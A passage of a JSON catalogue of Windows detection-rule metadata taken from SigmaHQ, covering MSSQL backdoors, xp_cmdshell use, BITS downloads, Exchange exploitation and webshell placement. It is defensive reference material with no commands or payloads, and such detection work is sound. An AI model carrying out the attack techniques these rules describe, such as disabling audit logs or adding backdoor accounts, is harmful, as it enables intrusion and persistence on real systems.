- "filename": "win_msi_install_from_susp_locations.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Some false positives may occur depending on the environnement" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects installation of a remote msi file from web.", - "uuid": "5594e67a-7f92-4a04-b65d-1a42fd824a60", - "value": "MSI Installation From Web", - "meta": { - "refs": [ - "https://twitter.com/_st0pp3r_/status/1583922009842802689", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_msi_install_from_web.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218", - "attack.t1218.007" - ], - "creation_date": "2022/10/23", - "filename": "win_msi_install_from_web.yml", - "author": "Stamatis Chatzimangou", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", - "uuid": "08200f85-2678-463e-9c32-88dce2f073d1", - "value": "MSSQL Add Account To Sysadmin Role", - "meta": { - "refs": [ - "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_add_sysadmin_account.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/07/13", - "filename": "win_mssql_add_sysadmin_account.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Rare legitimate administrative activity" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", - "uuid": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", - "value": "MSSQL Disable Audit Settings", - "meta": { - "refs": [ - "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", - "https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16", - "https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_disable_audit_settings.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/07/13", - "filename": "win_mssql_disable_audit_settings.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", - "uuid": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", - "value": "MSSQL Extended Stored Procedure Backdoor Maggie", - "meta": { - "refs": [ - "https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_sp_maggie.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546" - ], - "creation_date": "2022/10/09", - "filename": "win_mssql_sp_maggie.yml", - "author": "Denis Szadkowski, DIRT / DCSO CyTec", - "level": "high", - "falsepositive": [ - "Legitimate extended stored procedures named maggie" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", - "uuid": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", - "value": "MSSQL SPProcoption Set", - "meta": { - "refs": [ - "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", - "https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_sp_procoption_set.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/07/13", - "filename": "win_mssql_sp_procoption_set.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate use of the feature by administrators (rare)" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", - "uuid": "7f103213-a04e-4d59-8261-213dddf22314", - "value": "MSSQL XPCmdshell Suspicious Execution", - "meta": { - "refs": [ - "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_xp_cmdshell_audit_log.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/07/12", - "filename": "win_mssql_xp_cmdshell_audit_log.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", - "uuid": "d08dd86f-681e-4a00-a92c-1db218754417", - "value": "MSSQL XPCmdshell Option Change", - "meta": { - "refs": [ - "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_xp_cmdshell_change.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/07/12", - "filename": "win_mssql_xp_cmdshell_change.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate enable/disable of the setting", - "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", - "uuid": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", - "value": "Atera Agent Installation", - "meta": { - "refs": [ - "https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_software_atera_rmm_agent_install.yml" - ], - "tags": [ - "attack.t1219" - ], - "creation_date": "2021/09/01", - "filename": "win_software_atera_rmm_agent_install.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Legitimate Atera agent installation" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects backup catalog deletions", - "uuid": "9703792d-fd9a-456d-a672-ff92efe4806a", - "value": "Backup Catalog Deleted", - "meta": { - "refs": [ - "https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx", - "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_susp_backup_delete.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ], - "creation_date": "2017/05/12", - "filename": "win_susp_backup_delete.yml", - "author": "Florian Roth (rule), Tom U. @c_APT_ure (collection)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", - "uuid": "6c82cf5c-090d-4d57-9188-533577631108", - "value": "Microsoft Malware Protection Engine Crash", - "meta": { - "refs": [ - "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5", - "https://technet.microsoft.com/en-us/library/security/4022344", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_susp_msmpeng_crash.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1211", - "attack.t1562.001" - ], - "creation_date": "2017/05/09", - "filename": "win_susp_msmpeng_crash.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "MsMpEng.exe can crash when C:\\ is full" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688", - "uuid": "d6266bf5-935e-4661-b477-78772735a7cb", - "value": "CVE-2020-0688 Exploitation via Eventlog", - "meta": { - "refs": [ - "https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/", - "https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_vul_cve_2020_0688.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2020/02/29", - "filename": "win_vul_cve_2020_0688.yml", - "author": "Florian Roth, wagga", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", - "uuid": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", - "value": "LPE InstallerFileTakeOver PoC CVE-2021-41379", - "meta": { - "refs": [ - "https://github.com/klinix5/InstallerFileTakeOver", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_vul_cve_2021_41379.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2021/11/22", - "filename": "win_vul_cve_2021_41379.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Other MSI packages for which your admins have used that name" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.", - "uuid": "401e5d00-b944-11ea-8f9a-00163ecd60ae", - "value": "File Was Not Allowed To Run", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/using-event-viewer-with-applocker", - "https://nxlog.co/documentation/nxlog-user-guide/applocker.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.006", - "attack.t1059.007" - ], - "creation_date": "2020/06/28", - "filename": "win_applocker_file_was_not_allowed_to_run.yml", - "author": "Pushkarev Dmitry", - "level": "medium", - "falsepositive": [ - "Need tuning applocker or add exceptions in SIEM" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "uuid": "d635249d-86b5-4dad-a8c7-d7272b788586", - "value": "Suspicious Download with BITS from Suspicious TLD", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", - "https://twitter.com/malmoeb/status/1535142803075960832", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_domain.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" - ], - "creation_date": "2022/06/28", - "filename": "win_bits_client_susp_domain.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "uuid": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", - "value": "Suspicious Download File Extension with BITS", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_local_file.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" - ], - "creation_date": "2022/03/01", - "filename": "win_bits_client_susp_local_file.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Administrator PowerShell scripts" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "uuid": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", - "value": "Download with BITS to Suspicious Folder", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_local_folder.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" - ], - "creation_date": "2022/06/28", - "filename": "win_bits_client_susp_local_folder.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Administrator PowerShell scripts" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "uuid": "fe3a2d49-f255-4d10-935c-bda7391108eb", - "value": "Suspicious Task Added by Powershell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_powershell_job.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" - ], - "creation_date": "2022/03/01", - "filename": "win_bits_client_susp_powershell_job.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Administrator PowerShell scripts" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "uuid": "1ff315dc-2a3a-4b71-8dde-873818d25d39", - "value": "Suspicious Task Added by Bitsadmin", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_use_bitsadmin.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" - ], - "creation_date": "2022/03/01", - "filename": "win_bits_client_susp_use_bitsadmin.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Administrator PowerShell scripts" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "uuid": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", - "value": "Suspicious Uncommon Download with BITS from Suspicious TLD", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", - "https://twitter.com/malmoeb/status/1535142803075960832", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_uncommon_domain.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" - ], - "creation_date": "2022/06/10", - "filename": "win_bits_client_uncommon_domain.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Other legitimate domains used by software updaters" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired", - "uuid": "f8931561-97f5-4c46-907f-0a4a592e47a7", - "value": "Code Integrity Attempted DLL Load", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1483810148602814466", - "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/01/20", - "filename": "win_codeintegrity_attempted_dll_load.yml", - "author": "Florian Roth, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Antivirus products" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects blocked load attempts of revoked drivers", - "uuid": "9b72b82d-f1c5-4632-b589-187159bc6ec1", - "value": "Block Load Of Revoked Driver", - "meta": { - "refs": [ - "https://twitter.com/wdormann/status/1590434950335320065", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ], - "creation_date": "2022/11/10", - "filename": "win_codeintegrity_revoked_driver.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", - "uuid": "e4be5675-4a53-426a-8c81-a8bb2387e947", - "value": "Code Integrity Blocked Driver Load", - "meta": { - "refs": [ - "https://twitter.com/wdormann/status/1590434950335320065", - "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintergiry_blocked_driver_load.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ], - "creation_date": "2022/11/10", - "filename": "win_codeintergiry_blocked_driver_load.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", - "uuid": "50cb47b8-2c33-4b23-a2e9-4600657d9746", - "value": "Loading Diagcab Package From Remote Path", - "meta": { - "refs": [ - "https://twitter.com/nas_bench/status/1539679555908141061", - "https://twitter.com/j00sean/status/1537750439701225472", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/08/14", - "filename": "win_diagnosis_scripted_load_remote_diagcab.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate package hosted on a known and authorized remote location" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", - "uuid": "3db10f25-2527-4b79-8d4b-471eb900ee29", - "value": "GALLIUM Artefacts - Builtin", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_apt_gallium.yml" - ], - "tags": [ - "attack.credential_access", - "attack.command_and_control", - "attack.t1071" - ], - "creation_date": "2020/02/07", - "filename": "win_apt_gallium.yml", - "author": "Tim Burrell", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This rule detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", - "uuid": "cbe51394-cd93-4473-b555-edf0144952d9", - "value": "DNS Server Error Failed Loading the ServerLevelPluginDLL", - "meta": { - "refs": [ - "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", - "https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx", - "https://twitter.com/gentilkiwi/status/861641945944391680", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_susp_dns_config.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2017/05/08", - "filename": "win_susp_dns_config.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects plugged USB devices", - "uuid": "1a4bd6e3-4c6e-405d-a9a3-53a116e341d4", - "value": "USB Device Plugged", - "meta": { - "refs": [ - "https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/", - "https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1200" - ], - "creation_date": "2017/11/09", - "filename": "win_usb_device_plugged.yml", - "author": "Florian Roth", - "level": "low", - "falsepositive": [ - "Legitimate administrative activity" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "A rule has been modified in the Windows Firewall exception list", - "uuid": "cde0a575-7d3d-4a49-9817-b8004a7bf105", - "value": "Added Rule in Windows Firewall with Advanced Security", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_add_rule.yml" - ], - "tags": "No established tags", - "creation_date": "2022/02/19", - "filename": "win_firewall_as_add_rule.yml", - "author": "frack113", - "level": "medium", - "falsepositive": "No established falsepositives", - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "A rule has been modified in the Windows Firewall exception list", - "uuid": "5570c4d9-8fdd-4622-965b-403a5a101aa0", - "value": "Modified Rule in Windows Firewall with Advanced Security", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_change_rule.yml" - ], - "tags": "No established tags", - "creation_date": "2022/02/19", - "filename": "win_firewall_as_change_rule.yml", - "author": "frack113", - "level": "low", - "falsepositive": "No established falsepositives", - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "A rule has been deleted in the Windows Firewall exception list.", - "uuid": "c187c075-bb3e-4c62-b4fa-beae0ffc211f", - "value": "Delete Rule in Windows Firewall with Advanced Security", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_delete_rule.yml" - ], - "tags": "No established tags", - "creation_date": "2022/02/19", - "filename": "win_firewall_as_delete_rule.yml", - "author": "frack113", - "level": "medium", - "falsepositive": "No established falsepositives", - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "The Windows Firewall service failed to load Group Policy.", - "uuid": "7ec15688-fd24-4177-ba43-1a950537ee39", - "value": "Failed to Load Policy in Windows Firewall with Advanced Security", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_failed.yml" - ], - "tags": "No established tags", - "creation_date": "2022/02/19", - "filename": "win_firewall_as_failed.yml", - "author": "frack113", - "level": "low", - "falsepositive": "No established falsepositives", - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Windows Firewall has been reset to its default configuration.", - "uuid": "04b60639-39c0-412a-9fbe-e82499c881a3", - "value": "Reset to Default Configuration Windows Firewall with Advanced Security", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_reset.yml" - ], - "tags": "No established tags", - "creation_date": "2022/02/19", - "filename": "win_firewall_as_reset.yml", - "author": "frack113", - "level": "low", - "falsepositive": "No established falsepositives", - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Setting have been change in Windows Firewall", - "uuid": "00bb5bd5-1379-4fcf-a965-a5b6f7478064", - "value": "Setting Change in Windows Firewall with Advanced Security", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_setting_change.yml" - ], - "tags": "No established tags", - "creation_date": "2022/02/19", - "filename": "win_firewall_as_setting_change.yml", - "author": "frack113", - "level": "low", - "falsepositive": "No established falsepositives", - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects possible Active Directory enumeration via LDAP", - "uuid": "31d68132-4038-47c7-8f8e-635a39a7c174", - "value": "LDAP Reconnaissance / Active Directory Enumeration", - "meta": { - "refs": [ - "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726", - "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1", - "https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ldap/win_ldap_recon.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.002", - "attack.t1087.002", - "attack.t1482" - ], - "creation_date": "2021/06/22", - "filename": "win_ldap_recon.yml", - "author": "Adeem Mawani", - "level": "medium", - "falsepositive": "No established falsepositives", - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", - "uuid": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", - "value": "Possible Exploitation of Exchange RCE CVE-2021-42321", - "meta": { - "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42321", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_cve_2021_42321.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1210" - ], - "creation_date": "2021/11/18", - "filename": "win_exchange_cve_2021_42321.yml", - "author": "Florian Roth, @testanull", - "level": "high", - "falsepositive": [ - "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory", - "uuid": "550d3350-bb8a-4ff3-9533-2ba533f4a1c0", - "value": "ProxyLogon MSExchange OabVirtualDirectory", - "meta": { - "refs": [ - "https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml" - ], - "tags": [ - "attack.t1587.001", - "attack.resource_development" - ], - "creation_date": "2021/08/09", - "filename": "win_exchange_proxylogon_oabvirtualdir.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell", - "uuid": "b7bc7038-638b-4ffd-880c-292c692209ef", - "value": "Certificate Request Export to Exchange Webserver", - "meta": { - "refs": [ - "https://twitter.com/GossiTheDog/status/1429175908905127938", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2021/08/23", - "filename": "win_exchange_proxyshell_certificate_generation.yml", - "author": "Max Altgelt", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it", - "uuid": "516376b4-05cd-4122-bae0-ad7641c38d48", - "value": "Mailbox Export to Exchange Webserver", - "meta": { - "refs": [ - 